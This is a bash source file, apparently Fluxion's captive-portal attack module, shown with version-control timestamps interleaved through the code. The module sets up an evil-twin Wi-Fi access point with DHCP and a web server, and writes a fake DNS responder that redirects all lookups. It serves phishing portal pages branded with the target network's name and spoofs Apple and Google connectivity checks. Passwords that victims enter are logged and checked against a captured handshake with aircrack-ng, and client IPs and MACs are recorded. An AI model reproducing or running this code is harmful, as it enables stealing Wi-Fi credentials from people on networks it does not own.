2017-08-08 12:48:00 -06:00
#!/bin/bash
############################# < Captive Portal Parameters > ############################
CaptivePortalState = "Not Ready"
CaptivePortalPassLog = " $FLUXIONPath /attacks/Captive Portal/pwdlog "
CaptivePortalNetLog = " $FLUXIONPath /attacks/Captive Portal/netlog "
CaptivePortalJamTime = "9999999999999"
CaptivePortalAuthenticationMethods = ( "hash" ) # "wpa_supplicant")
CaptivePortalAuthenticationMethodsInfo = ( " (handshake file, ${ CGrn } recommended $CClr ) " ) # "(Target AP authentication, slow)")
########################### < Virtual Network Configuration > ##########################
# To avoid collapsing with an already connected network, we'll use an uncommon network.
VIGWAddress = "192.168.254.1"
VIGWNetwork = ${ VIGWAddress %.* }
2017-12-05 20:22:06 -07:00
function captive_portal_run_interface( ) {
if [ ! " $1 " ] ; then return 1; fi
# Create an identifier for the access point, AP virtual interface.
local wiAccessPoint = " FX ${ 1 : 2 } AP "
# Find interface's physical device.
if ! interface_physical " $1 "
then echo -e " $FLUXIONVLine $FLUXIONPhysicalWIDeviceUnknownError " ; sleep 5; return 1
fi
local wiAccessPointDevice = " $InterfacePhysical "
# Create the new virtual interface with the generated identifier.
echo -e " $FLUXIONVLine $CaptivePortalStartingInterfaceNotice "
if ! iw phy $wiAccessPointDevice interface add $wiAccessPoint type monitor 2> $FLUXIONOutputDevice ; then
echo -e " $FLUXIONVLine $CaptivePortalCannotStartInterfaceError "
sleep 5
return 3
fi
echo -e " $FLUXIONVLine $CaptivePortalStartedInterfaceNotice "
sleep 3
CaptivePortalRunInterface = " $wiAccessPoint "
}
2017-09-02 13:28:45 -06:00
function captive_portal_unset_interface( ) {
if [ ! " $WIAccessPoint " ] ; then return 1; fi
if interface_is_wireless " $WIAccessPoint "
then fluxion_unset_ap_service
fi
2017-09-03 14:57:37 -06:00
if [ " $WIAccessPoint " = " FX ${ WIMonitor : 2 } AP " ] ; then
2017-09-02 18:47:03 -06:00
# Remove any previously created fluxion AP interfaces.
iw dev " $WIAccessPoint " del & > $FLUXIONOutputDevice
fi
2017-09-02 13:28:45 -06:00
WIAccessPoint = ""
}
function captive_portal_set_interface( ) {
2017-09-02 14:35:51 -06:00
if [ " $WIAccessPoint " ] ; then return 0; fi
2017-09-02 13:28:45 -06:00
captive_portal_unset_interface
# Gather candidate interfaces.
echo -e " $FLUXIONVLine $FLUXIONFindingWINotice "
# List of all valid network interfaces.
interface_list_real
2017-09-02 18:47:03 -06:00
local ifAlternate = ( " $FLUXIONGeneralRepeatOption " " $FLUXIONGeneralBackOption " )
local ifAlternateInfo = ( "" "" )
local ifAlternateState = ( "" "" )
local ifAlternateColor = ( " $CClr " " $CClr " )
2017-09-02 13:28:45 -06:00
2017-09-02 18:47:03 -06:00
interface_prompt " $FLUXIONVLine $CaptivePortalInterfaceQuery " InterfaceListReal[ @] \
2017-09-02 13:28:45 -06:00
ifAlternate[ @] ifAlternateInfo[ @] ifAlternateState[ @] ifAlternateColor[ @]
2017-09-02 18:47:03 -06:00
case " $InterfacePromptIfSelected " in
2017-12-05 20:22:06 -07:00
" $FLUXIONGeneralBackOption " ) captive_portal_unset_interface; return 1; ;
2017-09-02 18:47:03 -06:00
# If the monitor interface is also the AP interface,
# there's no need to reserve it again, just add it.
" $WIMonitor " )
if ! captive_portal_run_interface " $InterfacePromptIfSelected "
then return 1
fi
WIAccessPoint = " $CaptivePortalRunInterface " ; ;
*)
# We'll only attempt to run wireless interfaces for now.
# The conditional below is a temporary fix for ethernet interfaces.
# TODO: Fix fluxion_run_interface to accept non-wireless interfaces.
if interface_is_wireless " $InterfacePromptIfSelected " ; then
if ! fluxion_run_interface " $InterfacePromptIfSelected "
then return 2
fi
WIAccessPoint = " $FluxionRunInterface "
else
WIAccessPoint = " $InterfacePromptIfSelected "
fi ; ;
esac
2017-09-02 13:28:45 -06:00
2017-09-03 15:12:55 -06:00
VIGW = $WIAccessPoint
VIAP = $WIAccessPoint
2017-09-02 13:28:45 -06:00
# Set an AP service if the interface selected is wireless.
if interface_is_wireless " $WIAccessPoint " ; then
if ! fluxion_set_ap_service
then captive_portal_unset_interface; return 1
fi
fi
}
2017-08-08 12:48:00 -06:00
function captive_portal_unset_auth( ) {
if [ ! " $APRogueAuthMode " ] ; then return 0; fi
2017-12-05 20:22:06 -07:00
case " $APRogueAuthMode " in
"hash" ) fluxion_unset_hash; ;
esac
2017-08-08 12:48:00 -06:00
APRogueAuthMode = ""
2017-12-05 20:22:06 -07:00
# If we've only got one option, then the user skipped this section
# by auto-selecting that single option, so we unset the previous
# phase along with this one to properly take the user back.
2017-08-08 12:48:00 -06:00
if [ ${# CaptivePortalAuthenticationMethods [@] } -le 1 ] ; then
2017-09-02 14:35:51 -06:00
captive_portal_unset_interface
2017-08-08 12:48:00 -06:00
fi
}
function captive_portal_set_auth( ) {
if [ " $APRogueAuthMode " ] ; then
echo "Captive Portal authentication mode is already set, skipping!" > $FLUXIONOutputDevice
2017-12-05 20:22:06 -07:00
return 0
2017-08-08 12:48:00 -06:00
fi
captive_portal_unset_auth
2017-12-05 20:22:06 -07:00
# If we've got only one choice, auto-select it for the user.
2017-08-08 12:48:00 -06:00
if [ ${# CaptivePortalAuthenticationMethods [@] } -eq 1 -o \
2017-08-16 00:01:51 -06:00
${# CaptivePortalAuthenticationMethods [@] } -ge 1 -a " $FLUXIONAuto " ] ; then
2017-08-08 12:48:00 -06:00
APRogueAuthMode = " ${ CaptivePortalAuthenticationMethods [0] } "
2017-12-05 20:22:06 -07:00
echo " Auto-selected authentication method: $APRogueAuthMode " > $FLUXIONOutputDevice
2017-08-08 12:48:00 -06:00
else
fluxion_header
2017-08-10 21:02:12 -06:00
echo -e " $FLUXIONVLine $CaptivePortalVerificationMethodQuery "
2017-08-08 12:48:00 -06:00
echo
2017-09-02 18:47:03 -06:00
fluxion_show_ap_info " $APTargetSSID " " $APTargetEncryption " " $APTargetChannel " " $APTargetMAC " " $APTargetMaker "
2017-08-08 12:48:00 -06:00
2017-08-10 21:02:12 -06:00
local choices = ( " ${ CaptivePortalAuthenticationMethods [@] } " " $FLUXIONGeneralBackOption " )
2017-08-08 12:48:00 -06:00
io_query_format_fields "" " \t $CRed [ $CYel %d $CRed ] $CClr %b %b\n " choices[ @] \
CaptivePortalAuthenticationMethodsInfo[ @]
2017-08-12 20:23:22 -06:00
echo
2017-08-08 12:48:00 -06:00
APRogueAuthMode = " ${ IOQueryFormatFields [0] } "
2017-12-05 20:22:06 -07:00
# If we're going back, reset everything and abort.
if [ [ " $APRogueAuthMode " = " $FLUXIONGeneralBackOption " ] ]
then captive_portal_unset_auth; return 1
2017-08-08 12:48:00 -06:00
fi
fi
2017-12-05 20:22:06 -07:00
# Process the authentication method selected.
captive_portal_set_auth_processingResult = 1 # Assume failure.
case " $APRogueAuthMode " in
"hash" ) fluxion_set_hash; captive_portal_set_auth_processingResult = $? ; ;
esac
2017-08-08 12:48:00 -06:00
2017-12-05 20:22:06 -07:00
# Assure authentication method processing was successful, abort otherwise.
if [ [ $captive_portal_set_auth_processingResult -ne 0 ] ]
then captive_portal_unset_auth; return 1;
fi
2017-08-08 12:48:00 -06:00
}
function captive_portal_run_certificate_generator( ) {
2017-08-18 01:39:52 -06:00
xterm -bg "#000000" -fg "#CCCCCC" -title "Generating Self-Signed SSL Certificate" -e openssl req -subj '/CN=captive.router.lan/O=CaptivePortal/OU=Networking/C=US' -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout " $FLUXIONWorkspacePath /server.pem " -out " $FLUXIONWorkspacePath /server.pem " # more details there https://www.openssl.org/docs/manmaster/apps/openssl.html
2017-08-09 18:31:32 -06:00
chmod 400 " $FLUXIONWorkspacePath /server.pem "
2017-08-08 12:48:00 -06:00
}
function captive_portal_unset_cert( ) {
sandbox_remove_workfile " $FLUXIONWorkspacePath /server.pem "
2017-12-05 20:22:06 -07:00
CaptivePortalSSL = ""
2017-08-08 12:48:00 -06:00
}
# Create Self-Signed SSL Certificate
function captive_portal_set_cert( ) {
2017-12-05 20:22:06 -07:00
if [ " $CaptivePortalSSL " ] ; then
echo " Captive Portal SSL mode already set to $CaptivePortalSSL ! " > $FLUXIONOutputDevice
return 0
fi
captive_portal_unset_cert
# Check for existance of ssl certificate within fluxion with file size > 0
# If a certificate exists, it's user supplied (fancy), copy it to fluxspace.
2017-08-09 18:31:32 -06:00
if [ -f " $FLUXIONPath /attacks/Captive Portal/certificate/server.pem " -a \
-s " $FLUXIONPath /attacks/Captive Portal/certificate/server.pem " ] ; then
cp " $FLUXIONPath /attacks/Captive Portal/certificate/server.pem " \
" $FLUXIONWorkspacePath /server.pem "
2017-08-08 12:48:00 -06:00
2017-12-05 20:22:06 -07:00
CaptivePortalSSL = "enabled" # Must be enabled if sourcing own certificate
echo "Captive Portal certificate was user supplied, skipping query!" > $FLUXIONOutputDevice
2017-08-08 12:48:00 -06:00
return 0;
fi
2017-08-16 00:01:51 -06:00
if [ " $FLUXIONAuto " ] ; then
2017-12-05 20:22:06 -07:00
# If cert generator fails, gtfo, something broke!
if ! captive_portal_run_certificate_generator
then fluxion_conditional_bail "cert-gen failed!" ; return 2
fi
CaptivePortalSSL = "enabled"
2017-08-16 00:01:51 -06:00
else
2017-12-05 20:22:06 -07:00
local choices = ( " $CaptivePortalCertificateSourceGenerateOption " " $CaptivePortalCertificateSourceRescanOption " " $CaptivePortalCertificateSourceDisabledOption " " $FLUXIONGeneralBackOption " )
io_query_choice " $CaptivePortalCertificateSourceQuery " choices[ @]
echo
case " $IOQueryChoice " in
" $CaptivePortalCertificateSourceGenerateOption " )
# If cert generator fails, gtfo, something broke!
if ! captive_portal_run_certificate_generator
then fluxion_conditional_bail "cert-gen failed!" ; return 2
fi
CaptivePortalSSL = "enabled" ; ;
" $CaptivePortalCertificateSourceRescanOption " )
captive_portal_set_cert; return $? ; ;
" $CaptivePortalCertificateSourceDisabledOption " )
captive_portal_unset_cert; CaptivePortalSSL = "disabled" ; ;
" $FLUXIONGeneralBackOption " ) captive_portal_unset_cert; return 1; ;
*) fluxion_conditional_bail "Unknown cert-gen option!" ; return 2; ;
esac
2017-08-16 00:01:51 -06:00
fi
2017-08-08 12:48:00 -06:00
}
2017-12-06 21:20:22 -07:00
function captive_portal_unset_conn( ) {
CaptivePortalConnectivity = ""
}
function captive_portal_set_conn( ) {
if [ " $CaptivePortalConnectivity " ] ; then return 0; fi
captive_portal_unset_conn
local choices = ( " $CaptivePortalConnectivityDisconnectedOption " " $CaptivePortalConnectivityEmulatedOption " " $FLUXIONGeneralBackOption " )
io_query_choice " $CaptivePortalConnectivityQuery " choices[ @]
case " $IOQueryChoice " in
" $CaptivePortalConnectivityDisconnectedOption " ) CaptivePortalConnectivity = "disconnected" ; ;
" $CaptivePortalConnectivityEmulatedOption " ) CaptivePortalConnectivity = "emulated" ; ;
" $FLUXIONGeneralBackOption " ) captive_portal_unset_conn; return 1; ;
*) fluxion_conditional_bail "Unknown connectivity option!" ; return 2; ;
esac
}
2017-08-08 12:48:00 -06:00
function captive_portal_unset_site( ) {
sandbox_remove_workfile " $FLUXIONWorkspacePath /captive_portal "
}
function captive_portal_set_site( ) {
2017-08-09 18:31:32 -06:00
if [ -d " $FLUXIONWorkspacePath /captive_portal " ] ; then
2017-08-08 12:48:00 -06:00
echo "Captive Portal site (interface) is already set, skipping!" > $FLUXIONOutputDevice
return 0;
fi
2017-08-10 21:02:12 -06:00
captive_portal_unset_site
2017-08-08 12:48:00 -06:00
2017-08-18 17:21:24 -06:00
local sites = ( )
# Attempt adding only if the directory exists.
2017-08-22 13:28:23 -06:00
if [ -d attacks/Captive\ Portal/generic/languages ] ; then
2017-08-18 17:21:24 -06:00
# Retrieve all generic sites available.
2017-08-21 09:18:31 -06:00
for site in attacks/Captive\ Portal/generic/languages/*.lang; do
sites += ( " ${ CaptivePortalGenericInterfaceOption } _`basename " ${ site %.lang } "`" )
2017-08-18 17:21:24 -06:00
done
fi
# Attempt adding only if the directory exists.
if [ -d attacks/Captive\ Portal/sites ] ; then
# Retrieve all available portal sites and
# store them without the .portal extension.
for site in attacks/Captive\ Portal/sites/*.portal; do
2017-08-21 09:18:31 -06:00
sites += ( "`basename " ${ site %.portal } "`" )
2017-08-18 17:21:24 -06:00
done
fi
2017-08-08 12:48:00 -06:00
2017-08-10 21:02:12 -06:00
local sitesIdentifier = ( " ${ sites [@]/_*/ } " " $FLUXIONGeneralBackOption " )
2017-08-08 12:48:00 -06:00
local sitesLanguage = ( " ${ sites [@]/*_/ } " )
2017-08-13 03:24:18 -06:00
format_center_dynamic " $CRed [ $CYel %02d $CRed ] $CClr %-44b $CBlu %10s $CClr "
local queryFieldOptionsFormat = $FormatCenterDynamic
2017-08-08 12:48:00 -06:00
fluxion_header
2017-09-02 14:35:51 -06:00
echo -e " $FLUXIONVLine $CaptivePortalUIQuery "
2017-08-16 13:47:56 -06:00
echo
2017-09-02 18:47:03 -06:00
fluxion_show_ap_info " $APTargetSSID " " $APTargetEncryption " " $APTargetChannel " " $APTargetMAC " " $APTargetMaker "
2017-08-08 12:48:00 -06:00
2017-08-16 13:47:56 -06:00
io_query_format_fields "" " $queryFieldOptionsFormat \n " \
2017-08-13 03:24:18 -06:00
sitesIdentifier[ @] sitesLanguage[ @]
2017-08-08 12:48:00 -06:00
2017-08-12 20:23:22 -06:00
echo
2017-08-08 12:48:00 -06:00
local site = " ${ IOQueryFormatFields [0] } "
local siteLanguage = " ${ IOQueryFormatFields [1] } "
local sitePath = " ${ site } _ ${ siteLanguage } "
case " $site " in
2017-08-10 21:02:12 -06:00
" $CaptivePortalGenericInterfaceOption " )
2017-08-21 09:18:31 -06:00
source " $FLUXIONPath /attacks/Captive Portal/generic/languages/ $siteLanguage .lang "
2017-08-08 20:37:52 -06:00
captive_portal_generic; ;
2017-08-10 21:02:12 -06:00
" $FLUXIONGeneralBackOption " )
2017-08-08 12:48:00 -06:00
captive_portal_unset_site
return 1; ;
* )
2017-08-10 21:02:12 -06:00
cp -r " $FLUXIONPath /attacks/Captive Portal/sites/ $sitePath .portal " \
" $FLUXIONWorkspacePath /captive_portal "
2017-08-15 18:36:19 -06:00
2017-08-15 18:57:04 -06:00
find " $FLUXIONWorkspacePath /captive_portal/ " -type f -exec sed -i -e 's/$APTargetSSID/' " ${ APTargetSSID // \/ / \\ \/ } " '/g; s/$APTargetMAC/' " ${ APTargetMAC // \/ / \\ \/ } " '/g; s/$APTargetChannel/' " ${ APTargetChannel // \/ / \\ \/ } " '/g' { } \; ; ;
2017-08-08 12:48:00 -06:00
esac
}
function captive_portal_unset_attack( ) {
sandbox_remove_workfile " $FLUXIONWorkspacePath /captive_portal_authenticator.sh "
2017-08-20 20:38:53 -06:00
sandbox_remove_workfile " $FLUXIONWorkspacePath /fluxion_captive_portal_dns.py "
2017-08-08 12:48:00 -06:00
sandbox_remove_workfile " $FLUXIONWorkspacePath /lighttpd.conf "
sandbox_remove_workfile " $FLUXIONWorkspacePath /dhcpd.leases "
sandbox_remove_workfile " $FLUXIONWorkspacePath /captive_portal/check.php "
2017-08-10 21:02:12 -06:00
sandbox_remove_workfile " $FLUXIONWorkspacePath /captive_portal "
2017-08-08 12:48:00 -06:00
2017-09-02 18:47:03 -06:00
# Only reset the AP if one has been defined.
if [ " $APRogueService " -a "`type -t ap_reset`" ]
then ap_reset
2017-08-08 12:48:00 -06:00
fi
}
2017-12-20 16:21:39 -07:00
function captive_portal_get_client_IP( ) {
2017-12-22 16:14:57 -07:00
if [ -f " $CaptivePortalPassLog / $APTargetSSIDClean - $APTargetMAC -IP.log " ] ; then
MatchedClientIP = $( cat " $CaptivePortalPassLog / $APTargetSSIDClean - $APTargetMAC -IP.log " | sed '/^\s*$/d' | tail -n 1 | head -n 1)
2017-12-20 07:14:18 -07:00
else
MatchedClientIP = "unknown"
fi
2017-12-20 16:21:39 -07:00
2017-12-20 07:14:18 -07:00
echo $MatchedClientIP
}
2017-12-20 16:21:39 -07:00
function captive_portal_get_IP_MAC( ) {
2017-12-22 16:14:57 -07:00
if [ -f " $CaptivePortalPassLog / $APTargetSSIDClean - $APTargetMAC -IP.log " ] && [ " $( captive_portal_get_client_IP) " != "" ] && [ -f " $FLUXIONWorkspacePath /clients.txt " ] ; then
2017-12-20 16:21:39 -07:00
IP = $( captive_portal_get_client_IP)
2017-12-22 05:57:15 -07:00
MatchedClientMAC = $( cat $FLUXIONWorkspacePath /clients.txt | grep $IP | awk '{print $5}' | grep : | head -n 1 | tr [ :upper:] [ :lower:] )
2017-12-20 07:14:18 -07:00
if [ " $( echo $MatchedClientMAC | wc -m) " != "18" ] ; then
MatchedClientMAC = "xx:xx:xx:xx:xx:xx"
fi
else
MatchedClientMAC = "unknown"
fi
echo $MatchedClientMAC
}
2017-12-20 16:21:39 -07:00
function captive_portal_get_MAC_brand( ) {
local MACManufacturer = ""
if [ $( captive_portal_get_IP_MAC) != "" ] ; then
MACManufacturer = $( macchanger -l | grep " $( echo " $( captive_portal_get_IP_MAC) " | cut -d ":" -f -3) " | cut -d " " -f 5-)
if echo " $MACManufacturer " | grep -q x; then
MACManufacturer = "unknown"
2017-12-20 07:14:18 -07:00
fi
else
2017-12-20 16:21:39 -07:00
MACManufacturer = "unknown"
2017-12-20 07:14:18 -07:00
fi
2017-12-20 16:21:39 -07:00
echo $MACManufacturer
2017-12-20 07:14:18 -07:00
}
2017-08-08 12:48:00 -06:00
# Create different settings required for the script
function captive_portal_set_attack( ) {
# AP Service: Prepare service for an attack.
2017-09-02 18:47:03 -06:00
if [ " $APRogueService " ]
then ap_prep
fi
2017-08-08 12:48:00 -06:00
2017-08-15 13:30:04 -06:00
# Add the PHP authenticator scripts, used to verify
2017-08-08 12:48:00 -06:00
# password attempts from users using the web interface.
2017-08-15 13:30:04 -06:00
local authenticatorFiles = ( "authenticator.php" "check.php" "update.php" )
2017-08-15 18:57:04 -06:00
2017-08-15 13:30:04 -06:00
for authenticatorFile in " ${ authenticatorFiles [@] } " ; do
cp " $FLUXIONPath /attacks/Captive Portal/lib/ $authenticatorFile " \
" $FLUXIONWorkspacePath /captive_portal/ $authenticatorFile "
2017-08-15 18:57:04 -06:00
sed -i -e 's/\$FLUXIONWorkspacePath/' " ${ FLUXIONWorkspacePath // \/ / \\ \/ } " '/g' \
2017-08-15 13:30:04 -06:00
" $FLUXIONWorkspacePath /captive_portal/ $authenticatorFile "
chmod u+x " $FLUXIONWorkspacePath /captive_portal/ $authenticatorFile "
done
2017-08-08 12:48:00 -06:00
2017-12-02 02:15:31 -07:00
# Add the files for captive portal internet connectivity checks.
cp -r " $FLUXIONPath /attacks/Captive Portal/lib/connectivity responses/ " \
" $FLUXIONWorkspacePath /captive_portal/connectivity_responses "
2017-08-08 12:48:00 -06:00
# Generate the dhcpd configuration file, which is
# used to provide DHCP service to APRogue clients.
echo " \
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet $VIGWNetwork .0 netmask 255.255.255.0 {
option broadcast-address $VIGWNetwork .255;
option routers $VIGWAddress ;
option subnet-mask 255.255.255.0;
option domain-name-servers $VIGWAddress ;
range $VIGWNetwork .100 $VIGWNetwork .254;
} \
2017-08-09 18:31:32 -06:00
" > " $FLUXIONWorkspacePath /dhcpd.conf"
2017-08-08 12:48:00 -06:00
#create an empty leases file
2017-08-09 18:31:32 -06:00
touch " $FLUXIONWorkspacePath /dhcpd.leases "
2017-08-08 12:48:00 -06:00
# Generate configuration for a lighttpd web-server.
echo " \
server.document-root = \" $FLUXIONWorkspacePath /captive_portal/\"
server.modules = (
\" mod_access\" ,
\" mod_alias\" ,
\" mod_accesslog\" ,
\" mod_fastcgi\" ,
\" mod_redirect\" ,
\" mod_rewrite\"
)
2017-12-02 02:15:31 -07:00
accesslog.filename = \" $FLUXIONWorkspacePath /lighttpd.log\"
2017-08-08 12:48:00 -06:00
fastcgi.server = (
\" .php\" = > (
(
\" bin-path\" = > \" /usr/bin/php-cgi\" ,
\" socket\" = > \" /php.socket\"
)
)
)
server.port = 80
server.pid-file = \" /var/run/lighttpd.pid\"
# server.username = \"www\"
# server.groupname = \"www\"
mimetype.assign = (
\" .html\" = > \" text/html\" ,
\" .htm\" = > \" text/html\" ,
\" .txt\" = > \" text/plain\" ,
\" .jpg\" = > \" image/jpeg\" ,
\" .png\" = > \" image/png\" ,
\" .css\" = > \" text/css\"
)
server.error-handler-404 = \" /\"
static-file.exclude-extensions = (
\" .fcgi\" ,
\" .php\" ,
\" .rb\" ,
\" ~\" ,
\" .inc\"
)
index-file.names = (
\" index.htm\" ,
2017-09-12 08:04:28 -06:00
\" index.html\" ,
\" index.php\"
2017-08-08 12:48:00 -06:00
)
2017-12-05 20:22:06 -07:00
" > " $FLUXIONWorkspacePath /lighttpd.conf"
2017-08-08 12:48:00 -06:00
2017-12-05 20:22:06 -07:00
# Configure lighttpd's SSL only if we've got a certificate and its key.
if [ -f " $FLUXIONWorkspacePath /server.pem " -a -s " $FLUXIONWorkspacePath /server.pem " ] ; then
echo " \
\$ SERVER[ \" socket\" ] = = \" :443\" {
ssl.engine = \" enable\"
ssl.pemfile = \" $FLUXIONWorkspacePath /server.pem\"
}
" >> " $FLUXIONWorkspacePath /lighttpd.conf"
fi
2017-12-02 02:15:31 -07:00
2017-12-06 21:20:22 -07:00
if [ " $CaptivePortalConnectivity " = "emulated" ] ; then
echo " \
2017-12-02 02:15:31 -07:00
# The following will emulate Apple's and Google's internet connectivity checks.
# This should help with no-internet-connection warnings in some devices.
2017-12-06 21:20:22 -07:00
\$ HTTP[ \" host\" ] = = \" captive.apple.com\" { # Respond with Apple's captive response.
server.document-root = \" $FLUXIONWorkspacePath /captive_portal/connectivity_responses/Apple/\"
}
2017-12-02 02:15:31 -07:00
2017-12-09 02:49:56 -07:00
# Respond with Google's captive response on certain domains.
2017-12-23 11:20:19 -07:00
# Domains: www.google.com, clients[0-9].google.com, connectivitycheck.gstatic.com, connectivitycheck.android.com, android.clients.google.com, alt[0-9]-mtalk.google.com, mtalk.google.com
\$ HTTP[ \" host\" ] = ~ \" ( ( www| ( android\. ) ?clients[ 0-9] *| ( alt[ 0-9] *-) ?mtalk) \. google| connectivitycheck\. ( android| gstatic) ) \. com\" {
2017-12-03 20:55:54 -07:00
server.document-root = \" $FLUXIONWorkspacePath /captive_portal/connectivity_responses/Google/\"
url.rewrite-once = ( \" ^/generate_204\$ \" = > \" generate_204.php\" )
}
2017-12-09 01:16:13 -07:00
" >> " $FLUXIONWorkspacePath /lighttpd.conf"
else
2017-12-09 02:49:56 -07:00
echo " \
2017-12-24 14:05:20 -07:00
# Redirect all traffic to the captive portal when not emulating a connection.
\$ HTTP[ \" host\" ] != \" captive.gateway.lan\" {
2017-12-24 16:41:16 -07:00
url.redirect-code = 302
2017-12-09 01:16:13 -07:00
url.redirect = (
\" ^/( .*) \" = > \" http://captive.gateway.lan/\" ,
)
}
2017-12-05 20:22:06 -07:00
" >> " $FLUXIONWorkspacePath /lighttpd.conf"
2017-12-06 21:20:22 -07:00
fi
2017-08-08 12:48:00 -06:00
2017-12-01 15:05:55 -07:00
# Create a DNS service with python, forwarding all traffic to gateway.
2017-08-08 12:48:00 -06:00
echo " \
import socket
class DNSQuery:
def __init__( self, data) :
self.data= data
self.dominio= ''
tipo = ( ord( data[ 2] ) >> 3) & 15
if tipo = = 0:
ini = 12
lon = ord( data[ ini] )
while lon != 0:
self.dominio+= data[ ini+1:ini+lon+1] +'.'
ini += lon+1
lon = ord( data[ ini] )
def respuesta( self, ip) :
packet = ''
if self.dominio:
packet += self.data[ :2] + \" \x 81\x 80\"
packet += self.data[ 4:6] + self.data[ 4:6] + '\x00\x00\x00\x00'
packet += self.data[ 12:]
packet += '\xc0\x0c'
packet += '\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04'
packet += str.join( '' ,map( lambda x: chr( int( x) ) , ip.split( '.' ) ) )
return packet
if __name__ = = '__main__' :
ip = '$VIGWAddress'
print 'pyminifakeDwebconfNS:: dom.query. 60 IN A %s' % ip
udps = socket.socket( socket.AF_INET, socket.SOCK_DGRAM)
udps.bind( ( '' ,53) )
try:
while 1:
data, addr = udps.recvfrom( 1024)
p = DNSQuery( data)
udps.sendto( p.respuesta( ip) , addr)
print 'Request: %s -> %s' % ( p.dominio, ip)
except KeyboardInterrupt:
print 'Finalizando'
udps.close( ) \
2017-08-20 20:38:53 -06:00
" > " $FLUXIONWorkspacePath /fluxion_captive_portal_dns.py"
2017-08-08 12:48:00 -06:00
2017-08-20 20:38:53 -06:00
chmod +x " $FLUXIONWorkspacePath /fluxion_captive_portal_dns.py "
2017-08-08 12:48:00 -06:00
# Attack arbiter script
echo " \
#!/bin/bash
function signal_stop_attack( ) {
kill -s SIGABRT $$ # Signal STOP ATTACK
2017-08-18 10:12:38 -06:00
handle_abort_authenticator
2017-08-08 12:48:00 -06:00
}
function handle_abort_authenticator( ) {
AuthenticatorState = \" aborted\"
}
trap signal_stop_attack SIGINT SIGHUP
trap handle_abort_authenticator SIGABRT
2017-08-09 18:31:32 -06:00
echo > \" $FLUXIONWorkspacePath /candidate.txt\"
echo -n \" 0\" > \" $FLUXIONWorkspacePath /hit.txt\"
2017-08-08 12:48:00 -06:00
2017-12-22 16:14:57 -07:00
# Assure we've got a directory to store net logs into.
if [ ! -d \" $CaptivePortalNetLog \" ] ; then
mkdir -p \" $CaptivePortalNetLog \"
fi
# Assure we've got a directory to store pwd logs into.
if [ ! -d \" $CaptivePortalPassLog \" ] ; then
mkdir -p \" $CaptivePortalPassLog \"
fi
2017-12-01 15:05:55 -07:00
# Make console cursor invisible, cnorm to revert.
2017-08-08 12:48:00 -06:00
tput civis
clear
m = 0
h = 0
s = 0
i = 0
AuthenticatorState = \" running\"
startTime = \$ ( date +%s)
while [ \$ AuthenticatorState = \" running\" ] ; do
let s = \$ ( date +%s) -\$ startTime
d = \` expr \$ s / 86400\`
s = \` expr \$ s % 86400\`
h = \` expr \$ s / 3600\`
s = \` expr \$ s % 3600\`
m = \` expr \$ s / 60\`
s = \` expr \$ s % 60\`
if [ \" \$ s\" -le 9 ] ; then
is = \" 0\"
else
is =
fi
if [ \" \$ m\" -le 9 ] ; then
im = \" 0\"
else
im =
fi
if [ \" \$ h\" -le 9 ] ; then
ih = \" 0\"
else
ih =
fi
2017-08-09 18:31:32 -06:00
if [ -f \" $FLUXIONWorkspacePath /pwdattempt.txt\" -a -s \" $FLUXIONWorkspacePath /pwdattempt.txt\" ] ; then
2017-08-08 12:48:00 -06:00
# Save any new password attempt.
2017-12-22 00:40:06 -07:00
cat \" $FLUXIONWorkspacePath /pwdattempt.txt\" >> \" $CaptivePortalPassLog /${ APTargetSSIDClean // \" / \\ \" } -$APTargetMAC .log\"
2017-08-08 12:48:00 -06:00
# Clear logged password attempt.
2017-08-09 18:31:32 -06:00
echo -n > \" $FLUXIONWorkspacePath /pwdattempt.txt\"
2017-08-08 12:48:00 -06:00
fi
2017-12-22 05:57:15 -07:00
if [ -f \" $FLUXIONWorkspacePath /ip_hits\" -a -s \" $FLUXIONWorkspacePath /ip_hits.txt\" ] ; then
cat \" $FLUXIONWorkspacePath /ip_hits\" >> \" $CaptivePortalPassLog /${ APTargetSSIDClean // \" / \\ \" } -$APTargetMAC -IP.log\"
echo \" \" >> \" $CaptivePortalPassLog /${ APTargetSSIDClean // \" / \\ \" } -$APTargetMAC -IP.log\"
echo -n > \" $FLUXIONWorkspacePath /ip_hits\"
fi
2017-08-09 18:31:32 -06:00
" >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
if [ $APRogueAuthMode = "hash" ] ; then
echo "
2017-08-09 18:31:32 -06:00
if [ -f \" $FLUXIONWorkspacePath /candidate_result.txt\" ] ; then
2017-08-08 12:48:00 -06:00
# Check if we've got the correct password by looking for anything other than \"Passphrase not in\".
2017-12-22 00:40:06 -07:00
if ! aircrack-ng -w \" $FLUXIONWorkspacePath /candidate.txt\" \" $FLUXIONWorkspacePath /${ APTargetSSIDClean // \" / \\ \" } -$APTargetMAC .cap\" | grep -qi \" Passphrase not in\" ; then
2017-12-12 14:24:52 -07:00
echo \" 2\" > \" $FLUXIONWorkspacePath /candidate_result.txt\"
sleep 1
2017-08-08 12:48:00 -06:00
break
2017-12-12 14:24:52 -07:00
2017-08-08 12:48:00 -06:00
else
2017-08-09 18:31:32 -06:00
echo \" 1\" > \" $FLUXIONWorkspacePath /candidate_result.txt\"
2017-12-14 06:07:43 -07:00
2017-08-08 12:48:00 -06:00
fi
2017-08-09 18:31:32 -06:00
fi " >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
fi
2017-12-22 00:40:06 -07:00
local staticSSID = $( printf "%q" " $APTargetSSID " | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g" )
2017-08-08 12:48:00 -06:00
echo "
DHCPClients = ( $( nmap -PR -sn -n -oG - $VIGWNetwork .100-110 2>& 1 | grep Host) )
echo
echo -e \" ACCESS POINT:\"
2017-12-22 00:40:06 -07:00
printf \" SSID ...........: $CWht %s$CClr \\ n\" \" $staticSSID \"
2017-08-20 13:04:22 -06:00
echo -e \" MAC ............: $CYel $APTargetMAC $CClr \"
echo -e \" Channel ........: $CWht $APTargetChannel $CClr \"
echo -e \" Vendor .........: $CGrn ${ APTargetMaker :- UNKNOWN } $CClr \"
echo -e \" Runtime ........: $CBlu \$ ih\$ h:\$ im\$ m:\$ is\$ s$CClr \"
echo -e \" Attempts .......: $CRed \$ ( cat $FLUXIONWorkspacePath /hit.txt) $CClr \"
echo -e \" Clients ........: $CBlu \$ ( cat $FLUXIONWorkspacePath /clients.txt | grep DHCPACK | awk '{print \$5}' | sort| uniq | wc -l) $CClr \"
